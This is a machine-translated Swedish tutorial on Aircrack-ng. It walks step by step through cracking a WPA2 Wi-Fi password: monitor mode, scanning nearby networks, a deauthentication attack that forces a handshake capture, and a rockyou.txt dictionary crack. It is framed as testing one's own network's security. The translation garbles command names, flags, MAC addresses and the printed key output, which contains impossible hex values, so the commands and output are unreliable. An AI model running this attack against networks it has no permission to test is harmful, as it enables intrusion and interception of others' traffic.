Hur man använder Aircrack-ng

How Use Aircrack Ng



För det mesta tänker folk aldrig på nätverket som de är anslutna till. De tänker aldrig på hur säkert det nätverket är och hur mycket de riskerar sina konfidentiella uppgifter dagligen. Du kan köra sårbarhetskontroller på dina wifi -nätverk med ett mycket kraftfullt verktyg som kallas Aircrack-ng och Wireshark. Wireshark används för att övervaka nätverksaktivitet. Aircrack-ng är mer som ett aggressivt verktyg som låter dig hacka och ge åtkomst till trådlösa anslutningar. Att tänka som inkräktare har alltid varit det säkraste sättet att skydda sig mot ett hack. Du kanske kan förstå de exakta åtgärder som en inkräktare kommer att vidta för att få åtkomst till ditt system genom att lära sig om aircrack. Du kan sedan utföra efterlevnadskontroller på ditt eget system för att säkerställa att det inte är osäkert.

Aircrack-ng är en komplett uppsättning programvara som är utformad för att testa WiFi -nätverkssäkerhet. Det är inte bara ett enda verktyg utan en samling verktyg, som alla har ett särskilt syfte. Olika områden av wifi -säkerhet kan arbetas med, som att övervaka åtkomstpunkten, testa, attackera nätverket, knäcka wifi -nätverket och testa det. Aircracks främsta mål är att fånga upp paketen och dechiffrera hash för att bryta lösenorden. Den stöder nästan alla nya trådlösa gränssnitt. Aircrack-ng är en förbättrad version av en föråldrad verktygssvit Aircrack, hänvisar ng till Ny generation . Några av de fantastiska verktygen som fungerar tillsammans för att ta ut en större uppgift.







Airmon:

Airmon-ng ingår i airrack-ng-kitet som placerar nätverkskortet i övervakningsläge. Nätverkskort accepterar vanligtvis bara paket som är inriktade på dem enligt definitionen i NIC: s MAC-adress, men med airmon-ng accepteras alla trådlösa paket, oavsett om de är riktade för dem eller inte. Du bör kunna fånga dessa paket utan att länka eller autentisera med åtkomstpunkten. Den används för att kontrollera statusen för en åtkomstpunkt genom att sätta nätverksgränssnittet i övervakningsläge. Först måste man konfigurera de trådlösa korten för att slå på bildskärmsläget och sedan döda alla bakgrundsprocesser om du tror att någon process stör det. Efter avslutade processer kan övervakningsläge aktiveras på det trådlösa gränssnittet genom att köra kommandot nedan:



[e -postskyddad]: ~ $sudoairmon-ng start wlan0#

Du kan också inaktivera övervakningsläget genom att stoppa airmon-ng när som helst med hjälp av kommandot nedan:

[e -postskyddad]: ~ $sudoairmon-ng stopp wlan0#

Airodump:

Airodump-ng används för att lista alla nätverk som omger oss och för att se värdefull information om dem. Den grundläggande funktionen för airodump-ng är att sniffa paket, så det är i huvudsak programmerat för att ta alla paket runt oss medan de sätts i bildskärmsläget. Vi kör det mot alla anslutningar runt omkring oss och samlar in data som antalet klienter som är anslutna till nätverket, deras motsvarande mac -adresser, krypteringsstil och kanalnamn och börjar sedan rikta in vårt målnätverk.

Genom att skriva kommandot airodump-ng och ge det nätverksgränssnittets namn som parameter kan vi aktivera det här verktyget. Den kommer att lista alla åtkomstpunkter, mängden datapaket, krypterings- och autentiseringsmetoder som används och nätverkets namn (ESSID). Ur hackningssynpunkt är mac -adresserna de viktigaste fälten.

[e -postskyddad]: ~ $sudoairodump-ng wlx0mon

Aircrack:

Aircrack används för lösenordsprickning. Efter att ha tagit alla paket med airodump kan vi knäcka nyckeln med flygkrack. Det knäcker dessa nycklar med två metoder PTW och FMS. PTW -tillvägagångssätt sker i två faser. Först används bara ARP -paketen, och först då, om nyckeln inte spricker efter sökningen, använder den alla andra fångade paket. En pluspunkt med PTW -metoden är att inte alla paket används för sprickbildningen. I det andra tillvägagångssättet, det vill säga FMS, använder vi både de statistiska modellerna och brute force algos för att knäcka nyckeln. En ordboksmetod kan också användas.

Luftspel:

Airplay-ng introducerar paket till ett trådlöst nätverk för att skapa eller påskynda trafik. Paket från två olika källor kan fångas upp av aireplay-ng. Det första är det levande nätverket, och det andra är paketen från den redan existerade pcap -filen. Airplay-ng är användbart under en deautentiseringsattack som riktar sig mot en trådlös åtkomstpunkt och en användare. Dessutom kan du utföra vissa attacker som kaffe latte attack med airplay-ng, ett verktyg som låter dig få en nyckel från klientens system. Du kan uppnå detta genom att fånga ett ARP -paket och sedan manipulera det och skicka tillbaka det till systemet. Klienten skapar sedan ett paket som kan fångas upp av airodump och aircrack knäcker nyckeln från det modifierade paketet. Några andra attackalternativ för airplay-ng inkluderar chopchop, fragment är förspel etc.

Flygbas:

Airbase-ng används för att omvandla en inkräktares dator till en komprometterad anslutningspunkt för andra att länka till. Med Airbase-ng kan du göra anspråk på att vara en laglig åtkomstpunkt och utföra man-in-the-middle-attacker på datorer som är anslutna till ditt nätverk. Den här typen av attacker kallas Evil Twin Attacks. Det är omöjligt för grundläggande användare att skilja mellan en laglig åtkomstpunkt och en falsk åtkomstpunkt. Så det onda tvillinghotet är bland de mest hotfulla trådlösa hoten vi står inför idag.

Airolib-ng:

Airolib påskyndar hackningsprocessen genom att lagra och hantera lösenordslistor och åtkomstpunkten. Databashanteringssystemet som används av detta program är SQLite3, som mestadels är tillgängligt på alla plattformar. Lösenordsprickning inkluderar beräkningen av den parvisa huvudnyckeln genom vilken den privata transienta nyckeln (PTK) extraheras. Med hjälp av PTK kan du bestämma rammeddelandeidentifieringskoden (MIC) för ett givet paket och teoretiskt hitta MIC som liknar paketet, så om PTK hade rätt hade PMK också rätt.

Om du vill se lösenordslistor och åtkomstnätverk som är lagrade i databasen skriver du följande kommando:

[e -postskyddad]: ~ $sudoairolib-ng testdatabas –statistik

Här är testdatabasen det db som du vill komma åt eller skapa, och –stats är den operation du vill utföra på den. Du kan utföra flera operationer på databasfälten, som att ge maximal prioritet åt något SSID eller något. Om du vill använda airolib-ng med aircrack-ng anger du följande kommando:

[e -postskyddad]: ~ $sudoaircrack-ng-rtestdatabas wpa2.eapol.cap

Här använder vi de redan beräknade PMK: erna som lagras i testdatabas för att påskynda processen för lösenordsprickning.

Spricka WPA/WPA2 med Aircrack-ng:

Låt oss titta på ett litet exempel på vad aircrack-ng kan göra med hjälp av några av dess fantastiska verktyg. Vi kommer att knäcka ett WPA/WPA2-nätverks fördelade nyckel med hjälp av en ordboksmetod.

Det första vi behöver göra är att lista nätverksgränssnitt som stöder övervakningsläge. Detta kan göras med följande kommando:

[e -postskyddad]: ~ $sudoairmon-ng

PHY Interface Driver Chipset

Phy0 wlx0 rtl8xxxu Realtek Semiconductor Corp.

Vi kan se ett gränssnitt; nu måste vi sätta nätverksgränssnittet vi har hittat (wlx0) i övervakningsläge med följande kommando:

[e -postskyddad]: ~ $sudoairmon-ng start wlx0

Det har aktiverat övervakningsläge på det anropade gränssnittet wlx0mon .

Nu bör vi börja lyssna på sändningar från närliggande routrar via vårt nätverksgränssnitt som vi har satt i övervakningsläge.

[e -postskyddad]: ~ $sudoairodump-ng wlx0mon

CH5 ][Förflutet:30s][ 2020-12-02 00:17



BSSID PWR Beacons#Data, #/s CH MB ENC CIPHER AUTH ESSID



E4: 6F:13: 04: CE:31 -Fyra fem 62 27 0 154e WPA2 CCMP PSK CrackIt

C4: E9:84:76:10:VARA-63 77 0 0 654e. WPA2 CCMP PSK Hackme

C8: 3A:35: A0: 4E: 01-63 84 0 0 854e WPA2 CCMP PSK Net07

74: GIVER:88:FA:38: 02-68 28 2 0 elva54e WPA2 CCMP PSK TP-Link_3802



BSSID STATION PWR Rate Lost Frames Probe



E4: 6F:13: 04: CE:315C: 3A:Fyra fem: D7: EA: 8B -3 0- 1e8 5

E4: 6F:13: 04: CE:31C4:67: D3: C2: CD: D7 -331e- 6e0 3

E4: 6F:13: 04: CE:315C: C3: 07:56:61: EF -35 0-1 0 6

E4: 6F:13: 04: CE:31FÖRE KRISTUS:91: B5: F8: 7E: D5 -390e-1 1002 13

Vårt målnätverk är Knäck det i det här fallet, som för närvarande körs på kanal 1.

Här för att knäcka lösenordet för målnätverket måste vi fånga en 4-vägs handskakning, vilket händer när en enhet försöker ansluta till ett nätverk. Vi kan fånga det genom att använda följande kommando:

[e -postskyddad]: ~ $sudoairodump-ng-c 1--bssid E4: 6F:13: 04: CE:31 -i /hem wlx0

-c : Kanal

–Bss : Bssid för målnätverket

-i : Namnet på katalogen där pcap -filen ska placeras

Nu måste vi vänta på att en enhet ska ansluta till nätverket, men det finns ett bättre sätt att fånga ett handslag. Vi kan avautentifiera enheterna till AP med hjälp av en avautentiseringsattack med följande kommando:

[e -postskyddad]: ~ $sudoluftspel-ng-0 -tillE4: 6F:13: 04: CE:31

till : Bssid för målnätverket

-0 : deauthentication attack

Vi har kopplat bort alla enheter och nu måste vi vänta på att en enhet ska ansluta till nätverket.

CH1 ][Förflutet:30s][ 2020-12-02 00:02][WPA -handslag: E4: 6F:13: 04: CE:31



BSSID PWR RXQ Beacons#Data, #/s CH MB ENC CIPHER AUTH E



E4: 6F:13: 04: CE:31 -47 1 228 807 36 154: e WPA2 CCMP PSK P



BSSID STATION PWR Rate Lost Frames Probe



E4: 6F:13: 04: CE:31FÖRE KRISTUS:91: B5: F8: 7E: D5 -35 0-1 0 1

E4: 6F:13: 04: CE:315C: 3A:Fyra fem: D7: EA: 8B -290e- 1e0 22

E4: 6F:13: 04: CE:31 88:28: B3:30:27: 7E -310e-1 0 32

E4: 6F:13: 04: CE:31C4:67: D3: C2: CD: D7 -350e- 6e263 708Knäck det

E4: 6F:13: 04: CE:31D4: 6A: 6A:99: ED: E3 -350e- 0e0 86

E4: 6F:13: 04: CE:315C: C3: 07:56:61: EF -37 0- 1e0 1

Vi fick en träff, och genom att titta i det övre högra hörnet bredvid tiden kan vi se att ett handslag har fångats. Titta nu i den angivna mappen ( /Hem i vårt fall) för en .pcap fil.

För att knäcka WPA -nyckeln kan vi använda följande kommando:

[e -postskyddad]: ~ $sudoaircrack-ng-a2 -irockyou.txt-bE4: 6F:13: 04: CE:31handskakning

b: Bssid för målnätverket

-a2: WPA2 -läge

Rockyou.txt: OrdbokenfilBegagnade

Handshake.cap: Thefil sominnehåller fångat handslag

Aircrack-ng1.2beta3

[00:01:49] 10566nycklar testade(1017,96till/s)

NYCKEL HITTAT! [du fick mig]

Huvudnyckel: 8D EC 0C EA D2 BC 6B H7 J8 K1 A0896B 7B 6D

0C 06 08 ED BC 6B H7 J8 K1 A0896B 7B B F7 6FfemtioC


Övergående nyckel: 4D C4 5R 6T76 996G 7H 8D EC

H7 J8 K1 A0896B 7B 6D AF 5B 8D 2D A0896B

A5 BD K1 A0896B 0C 08 0C 06 08 ED BC 6B H7 J8 K1 A089

8D EC 0C EA D2 BC 6B H7 J8 K1 A0896B

MAC: CB 5A F8 CE62B2 1B F7 6FfemtioC025 62E9 5D71

Nyckeln till vårt målnätverk har knäckts framgångsrikt.

Slutsats:

Trådlösa nätverk finns överallt, används av varje företag, från arbetare som använder smartphones till industriella styrenheter. Enligt forskning kommer nästan över 50 procent av internettrafiken att vara över WiFi år 2021. Trådlösa nätverk har många fördelar, kommunikation utanför dörrar, snabb internetåtkomst på platser där det är nästan omöjligt att lägga ledningar, kan utöka nätverket utan att installera kablar för alla andra användare och kan enkelt ansluta dina mobila enheter till dina hemmakontor medan du inte är där.

Trots dessa fördelar finns det ett stort frågetecken om din integritet och säkerhet. Som dessa nätverk; inom sändningsområdet för routrar är öppna för alla, de kan lätt attackeras och dina data kan lätt äventyras. Till exempel, om du är ansluten till någon offentlig wifi, kan alla som är anslutna till det nätverket enkelt kontrollera din nätverkstrafik med hjälp av viss intelligens och med hjälp av fantastiska tillgängliga verktyg och till och med dumpa den.